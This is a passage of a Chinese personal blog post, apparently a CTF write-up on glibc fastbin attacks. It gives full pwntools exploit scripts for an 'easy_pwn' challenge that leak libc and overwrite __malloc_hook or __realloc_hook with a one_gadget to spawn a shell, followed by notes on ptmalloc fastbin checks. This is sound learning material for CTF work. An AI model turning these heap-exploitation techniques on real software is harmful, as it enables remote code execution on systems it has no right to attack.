class="comment">#4</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">payload = p64(malloc_hook<span class="number">-0x23</span>)</span><br><span class="line">edit(<span class="number">2</span>, len(payload), payload)</span><br><span class="line"><span class="comment">#z()</span></span><br><span class="line">add(<span class="number">0x60</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x60</span>)<span class="comment">#6</span></span><br><span class="line"><span class="comment">#payload='a'*0xb+p64(ong_a)+p64(libc_addr+libc.symbols["realloc"])</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x13</span> +p64(one_a)</span><br><span class="line"><span class="comment">#z()</span></span><br><span class="line">edit(<span class="number">5</span>, len(payload), payload)</span><br><span class="line">add(<span class="number">0x60</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h5 id="第二种-realloc-hook"><a href="#第二种-realloc-hook" class="headerlink" title="第二种:realloc_hook"></a>第二种:realloc_hook</h5><p>众所周知，one_gadget要想成功得需要环境的匹配，那么有的时候会遇上环境原因而导致one_gadget全部不可用。这个时候就需要realloc_hook来调整堆栈使得one_gadget可用。</p>
<p>realloc函数在函数起始会检查realloc_hook的值是否为0，不为0则跳转至realloc_hook指向地址。<br>realloc_hook同malloc_hook相邻(也就是malloc_hook-0x08)，故可通过fastbin attack一同修改两个值。</p>
<p><img src="https://bbs.pediy.com/upload/attach/201901/3_8D489B4GNW7QYK4.jpg" alt="img"></p>
<p><img src="https://bbs.pediy.com/upload/attach/201901/3_CPMMKR8DZNMSN73.jpg" alt="img"></p>
<p>流程为push寄存器，最后全部pop出来跳转至realloc_hook的值。<br>将realloc_hook设置为选择好的one_gadget，将malloc_hook设置为realloc函数开头某一push寄存器处。push和pop的次数是一致的，若push次数减少则会压低堆栈，改变栈环境。这时one_gadget就会可以使用。具体要压低栈多少要根据环境决定，这里我们可以进行小于48字节内或72字节的堆栈调整。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./easy_pwn'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line"><span class="comment">#sh = remote('node3.buuoj.cn',28685)</span></span><br><span class="line"><span class="comment">#libc = ELF('./x64_libc.so.6')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'1'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(index, size, content)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'2'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(size))</span><br><span class="line">    sh.sendafter(<span class="string">': '</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'3'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(index)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, <span class="string">'4'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">': '</span>, str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">z</span><span class="params">(commond=<span class="string">''</span>)</span>:</span></span><br><span class="line">    gdb.attach(sh,commond)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#3</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="number">0x18</span> +<span class="number">10</span>, <span class="string">'a'</span>*<span class="number">0x18</span> + p8(<span class="number">0x91</span>) )</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line"><span class="comment">#sh.recvuntil("choice: ")</span></span><br><span class="line">result = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">log.success(<span class="string">'result = '</span> + hex(result))</span><br><span class="line">libc_addr = result - <span class="number">0x3c4b78</span></span><br><span class="line">malloc_hook = libc_addr +<span class="number">0x3c4b10</span></span><br><span class="line">log.success(<span class="string">'malloc_hook = '</span> + hex(malloc_hook))</span><br><span class="line">ong_a = libc_addr + <span class="number">0x4526a</span></span><br><span class="line"><span class="comment">#edit(2, 0x10, p64(0) + p64(libc_addr + libc.symbols['__free_hook'] - 0x40))</span></span><br><span class="line">add(<span class="number">0x60</span>)<span class="comment">#4</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">payload = p64(malloc_hook<span class="number">-0x23</span>)</span><br><span class="line">edit(<span class="number">2</span>, len(payload), payload)</span><br><span class="line"><span class="comment">#z()</span></span><br><span class="line">add(<span class="number">0x60</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x60</span>)<span class="comment">#6</span></span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">0xb</span>+p64(ong_a)+p64(libc_addr+libc.symbols[<span class="string">"realloc"</span>])</span><br><span class="line"><span class="comment">#payload = 'a'*0x13 +p64(one_a)</span></span><br><span class="line"><span class="comment">#z()</span></span><br><span class="line">edit(<span class="number">5</span>, len(payload), payload)</span><br><span class="line">add(<span class="number">0x60</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="fasted-bin-attack注意事项"><a href="#fasted-bin-attack注意事项" class="headerlink" title="fasted bin attack注意事项"></a>fasted bin attack注意事项</h2><p>（实际上只是自己笨，记录一点fasted bin的各种检测，以及各种绕过检测，成功attack的方法）</p>
<h3 id="（一）"><a href="#（一）" class="headerlink" title="（一）"></a>（一）</h3><p>先来看ptmalloc的响应用户内存分配要求的具体步骤：</p>
<blockquote>
<p>1) 获取分配区的锁，为了防止多个线程同时访问同一个分配区，在进行分配之前需要 取得分配区域的锁。线程先查看线程私有实例中是否已经存在一个分配区，如果存 在尝试对该分配区加锁，如果加锁成功，使用该分配区分配内存，否则，该线程搜 索分配区循环链表试图获得一个空闲（没有加锁）的分配区。如果所有的分配区都 已经加锁，那么 ptmalloc 会开辟一个新的分配区，把该分配区加入到全局分配区循 环链表和线程的私有实例中并加锁，然后使用该分配区进行分配操作。开辟出来的 新分配区一定为非主分配区，因为主分配区是从父进程那里继承来的。开辟非主分 配区时会调用 mmap()创建一个 sub-heap，并设置好 top chunk。 </p>
<p>2) 将用户的请求大小转换为实际需要分配的 chunk 空间大小。  </p>
<p>3) 判断所需分配chunk的大小是否满足chunk_size &lt;= max_fast (max_fast 默认为 64B)， 如果是的话，则转下一步，否则跳到第 5 步。 </p>
<p>4) 首先尝试在 fast bins 中取一个所需大小的 chunk 分配给用户。如果可以找到，则分 配结束。否则转到下一步。 </p>
</blockquote>
<p>其实看到第四步就可，我们只讲述fast bin范围内的。</p>
<h3 id="（二）"><a href="#（二）" class="headerlink" title="（二）"></a>（二）</h3><p>fast bin是一个单链表，是一个LIFO(<em>Last in, first out</em>后进先出)</p>
<p>即</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ptr1 = <span class="built_in">malloc</span>(<span class="number">0x20</span>)#chunk1;</span><br><span class="line">    ptr2 = <span class="built_in">malloc</span>(<span class="number">0x30</span>)#chunk2;</span><br><span class="line">    ptr3 = <span class="built_in">malloc</span>(<span class="number">0x40</span>)#chunk3;</span><br><span class="line">    <span class="built_in">free</span>(ptr1);</span><br><span class="line">    <span class="built_in">free</span>(ptr2);</span><br><span class="line">    <span class="built_in">free</span>(ptr3);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里我们仿照《glibc内存管理》一书中对于bins数组的结构来展示fast bin链表</p>
<p><img src="D:%5Cblog%5CHexo%5Csource_posts%5C%C2%96fastedbin-attack-%E6%8E%A2%E7%A9%B6%5Cimage-20191208011303551.png" alt="image-20191208011303551"></p>
<p>在fast bin的链表中结构为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">classDiagram</span><br><span class="line">fast bin &lt;|-- chunk1</span><br><span class="line">chunk1 : fd = </span><br><span class="line">chunk1 : bk()</span><br><span class="line">chunk1 &lt;|-- chunk2</span><br><span class="line">chunk2 : fd = chunk1</span><br><span class="line">chunk2 : bk()</span><br><span class="line">chunk2 &lt;|-- chunk3</span><br><span class="line">chunk3 : fd = chunk2</span><br><span class="line">chunk3 : bk()</span><br></pre></td></tr></table></figure>

<p>再次进行调用的时候，是先取用chunk3再取用chunk2再取用chunk1。这就是FILO。</p>
<p>至于为什么新free的chunk不直接插到靠近fast bin的地方，如果直接插到靠近fast bin的地方话每次都要迭代到最后一个chunk然后把它的fd赋值为新的chunk的地址，而使用LIFO，我们只需要修改fastbinsY[0]指针的值和新的chunk的值，花费在fastbin链有很多的时候肯定是更少的</p>
<h3 id="（三）"><a href="#（三）" class="headerlink" title="（三）"></a>（三）</h3><p>此时讲述的是malloc - free后的再次malloc环节</p>
<p>在我们进行fasted bin attack 打 hook，从 fastbin 中取出 chunk 的时候会对 chunk 的size 做检查，也就是这个任意位置的 chunk 的 size 位必须构造。</p>
<p>来看fastbin获取index的源码</p>
<blockquote>
<p>/* offset 2 to use otherwise unindexable first 2 bins */<br> #define fastbin_index(sz) \   </p>
<p>​    ((((unsigned int)(sz)) &gt;&gt; (SIZE_SZ == 8 ? 4 : 3)) - 2) </p>
<p>宏 fastbin_index(sz)用于获得 fast bin 在 fast bins 数组中的 index，由于 bin[0]和 bin[1]中 的chunk不存在，所以需要减2。</p>
</blockquote>
<p>个人理解：在64位里也就是(sz) &gt;&gt; 4获取Index。因此很多时候就可以构造0x7f大小的fastbin，代替很难找到的0x71\0x70大小的fastbin。</p>
<p>举个例子。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fastbin -&gt; 0x602078</span><br></pre></td></tr></table></figure>

<p>fastbin在malloc的时候会对size进行检查，也就是检查address+8的值是否为合法size。（即检查0x602080）</p>
<p>至于检测的方法，就是上面获取index的源码，进行&gt;&gt;运算，这就是我们为什么可以利用unsorted bin任意地址写，配合fasted bin attack的原因了。</p>

      
    </div>
    
    
    
<div>
    
      
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <p><span>本文标题:</span><a href="/2019/10/28/fastedbin-attack-探究/">fastedbin attack 探究</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 zhz 的个人博客">zhz</a></p>
  <p><span>发布时间:</span>2019年10月28日 - 23:10</p>
  <p><span>最后更新:</span>2020年04月24日 - 22:04</p>
  <p><span>原始链接:</span><a href="/2019/10/28/fastedbin-attack-探究/" title="fastedbin attack 探究">http://yoursite.com/2019/10/28/fastedbin-attack-探究/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://yoursite.com/2019/10/28/fastedbin-attack-探究/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>
</div>
<script>
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({
          title: "",
          text: '复制成功',
          html: false,
          timer: 500,
          showConfirmButton: false
        });
      });
    }));
</script>

    
  </div>
   

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    zhz
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://yoursite.com/2019/10/28/fastedbin-attack-探究/" title="fastedbin attack 探究">http://yoursite.com/2019/10/28/fastedbin-attack-探究/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/19/360赛/" rel="next" title="360赛">
                <i class="fa fa-chevron-left"></i> 360赛
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/28/对于canary的ssp-leak打法的学习（好像又名Stack-smash）/" rel="prev" title="对于canary的ssp leak打法的学习（好像又名Stack smash）">
                对于canary的ssp leak打法的学习（好像又名Stack smash） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/zhz.jpg" alt="zhz">
            
              <p class="site-author-name" itemprop="name">zhz</p>
              <p class="site-description motion-element" itemprop="description">盛世之下，总有人为你负重前行。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#fastbin-double-free"><span class="nav-number">1.</span> <span class="nav-text">fastbin double free</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#House-Of-Spirit"><span class="nav-number">2.</span> <span class="nav-text">House Of Spirit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Arbitrary-Alloc"><span class="nav-number">3.</span> <span class="nav-text">Arbitrary Alloc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#easy-pwn"><span class="nav-number">3.1.</span> <span class="nav-text">easy_pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#第一种-malloc-hook"><span class="nav-number">3.1.1.</span> <span class="nav-text">第一种:malloc_hook</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第二种-realloc-hook"><span class="nav-number">3.1.2.</span> <span class="nav-text">第二种:realloc_hook</span></a></li></ol></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#fasted-bin-attack注意事项"><span class="nav-number"></span> <span class="nav-text">fasted bin attack注意事项</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（一）"><span class="nav-number">1.</span> <span class="nav-text">（一）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（二）"><span class="nav-number">2.</span> <span class="nav-text">（二）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（三）"><span class="nav-number">3.</span> <span class="nav-text">（三）</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhz</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>





    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
